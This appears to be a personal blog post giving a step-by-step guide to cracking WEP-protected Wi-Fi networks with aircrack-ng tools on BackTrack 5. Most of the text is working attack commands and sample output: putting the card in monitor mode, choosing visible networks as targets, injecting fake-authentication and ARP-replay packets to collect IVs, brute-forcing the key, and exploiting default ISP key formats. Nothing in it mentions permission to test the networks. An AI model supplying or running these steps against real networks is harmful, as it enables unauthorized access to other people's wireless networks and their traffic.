There are 100's if not 1000's of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP them self's.
Aircrack-ng's guide to cracking WEP
Download and boot off of
backtrack 5 r3 To install it on a flash drive use linux/windows tool
First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.
#airmon-zc start wlan0
#airodump-ng --encrypt wep mon0
You should see several AP. Record the BSSID, ESSID, and Channel along with any associated clients shown at the bottom of airodump-ng.
Once you find a couple targets on the same channel. You need to close airodump and stop airmon
#airmon-zc stop mon0
Start airmon-zc on the channel of the target. (with WEP its not as necessary to lock the channel in on the driver as you have to with WPA)
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>
Now you need to inject packets. This will send packets to the access point as the other associated client generating your golden IVS you need to crack the WEP.
#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client>
If the above isn't generating any IVs you might need to tweak your command line.
#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client>
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# and so on.
Here is an example of what a failed authentication looks like:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request
You can also do a ARP request replay attack. Either at the same time or in lieu of the above attack.
#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>
Here is what the screen looks like when ARP requests are being injected:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Now to crack the IV's you have obtain. There are a lot of different options at this point. For example. AT&T U-verse default wep is only numbers. Verizon FIOS wep is 0-9A-F. Doing home work on the default SSID might lead to a quicker crack.
Static WEP cracking options:
-c Search alpha-numeric characters only.
-t Search binary coded decimal characters only.
-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.
-f <fudge>
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
#aircrack-ng <any static WEP cracking options above> <filename>.cap
It will ask you to select your network you want to crack and show how many IV's it currently has.
I only use the -f 1 option to get keys that are to easy and are thought to be false positives i.e. 123456789 or 111111111
and remember a few quick google searches on the SSID (if its a default SSID) can save you a lot of time.
Side note: if you run:
#iwconfig wlan0
And your power isn't set correctly to your gear you can change this by.
#iwconfig wlan0 twpower <dbi>
This is not a complete guide of everything you can do. Its just what I do and have a high success rate. if you have any questions feel free to drop me a e-mail/Gtalk at